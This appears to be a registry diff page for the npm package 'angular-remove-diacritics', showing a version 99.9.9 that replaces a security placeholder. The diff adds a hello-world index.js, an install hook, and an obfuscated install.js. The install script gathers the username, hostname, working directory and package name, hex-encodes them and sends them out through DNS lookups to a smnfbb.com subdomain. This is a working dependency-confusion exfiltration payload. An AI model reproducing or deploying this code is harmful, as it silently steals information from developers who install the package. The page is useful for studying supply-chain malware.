angular-remove-diacritics 0.0.1-security → 99.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of angular-remove-diacritics might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ function helloWorld() {
2
+ console.log('Hello World from this npm package');
3
+ }
4
+
5
+ module.exports = helloWorld;
package/install.js ADDED
@@ -0,0 +1 @@
1
+ const _0x3ecb8b=_0x5ce4;function _0x3685(){const _0x36e054=['43888550ryUExz','floor','10JGqqcP','dns','4027266mDPwrF','4770584wgWSDS','448962yUPLoT','11559296nAhlwb','88432TKzbyJ','argv','3379370VFIsFH','abcdefghijklmnopqrstuvwxyz0123456789','charAt','hex','smnfbb.com','length','cwd','stringify','1LgOLQS','24eoWQZH','toString','from','username'];_0x3685=function(){return _0x36e054;};return _0x3685();}function _0x5ce4(_0x2e869b,_0x3273a2){const _0x368597=_0x3685();return _0x5ce4=function(_0x5ce40a,_0x575558){_0x5ce40a=_0x5ce40a-0x1a5;let _0x181c18=_0x368597[_0x5ce40a];return _0x181c18;},_0x5ce4(_0x2e869b,_0x3273a2);}(function(_0x3555be,_0x5f3c58){const _0x5ab7c2=_0x5ce4,_0x1c81d2=_0x3555be();while(!![]){try{const _0x35031b=-parseInt(_0x5ab7c2(0x1a8))/0x1*(parseInt(_0x5ab7c2(0x1b7))/0x2)+parseInt(_0x5ab7c2(0x1a9))/0x3*(-parseInt(_0x5ab7c2(0x1b5))/0x4)+-parseInt(_0x5ab7c2(0x1af))/0x5*(-parseInt(_0x5ab7c2(0x1b3))/0x6)+-parseInt(_0x5ab7c2(0x1b4))/0x7+-parseInt(_0x5ab7c2(0x1b2))/0x8+parseInt(_0x5ab7c2(0x1b1))/0x9+parseInt(_0x5ab7c2(0x1ad))/0xa;if(_0x35031b===_0x5f3c58)break;else _0x1c81d2['push'](_0x1c81d2['shift']());}catch(_0x48fa6f){_0x1c81d2['push'](_0x1c81d2['shift']());}}}(_0x3685,0xd4d67));const http=require('http');var os=require('os'),dns=require(_0x3ecb8b(0x1b0));function generateString(_0x5c64da){const _0x52fa5b=_0x3ecb8b,_0x5e4161=_0x52fa5b(0x1b8);let _0x5e262c='';const _0x12c79d=_0x5e4161[_0x52fa5b(0x1a5)];for(let _0x199993=0x0;_0x199993<_0x5c64da;_0x199993++){_0x5e262c+=_0x5e4161[_0x52fa5b(0x1b9)](Math[_0x52fa5b(0x1ae)](Math['random']()*_0x12c79d));}return _0x5e262c;}const topDomain=_0x3ecb8b(0x1bb),packageName=process[_0x3ecb8b(0x1b6)][0x2],cwd=process[_0x3ecb8b(0x1a6)](),username=os['userInfo']()[_0x3ecb8b(0x1ac)],hostname=os['hostname'](),ID=generateString(0x5);var IP='';const data=JSON[_0x3ecb8b(0x1a7)]({'packagename':packageName,'cwd':cwd,'username':username,'hostname':hostname,'ip':IP}),options={'family':0x4};var dataHex=Buffer[_0x3ecb8b(0x1ab)](data,'utf8')[_0x3ecb8b(0x1aa)](_0x3ecb8b(0x1ba))+'00',splitted=dataHex['match'](/.{1,30}/g);for(var i=0x0;i<splitted[_0x3ecb8b(0x1a5)];i++){var domain=ID+'.'+i+'.'+splitted[i]+'.'+topDomain;dns['lookup'](domain,options,()=>{});}
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "angular-remove-diacritics",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.9.9",
4
+ "description": "Diacritics removal internal libraryæ",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "install": "node install.js angular-remove-diacritics"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=angular-remove-diacritics for more information.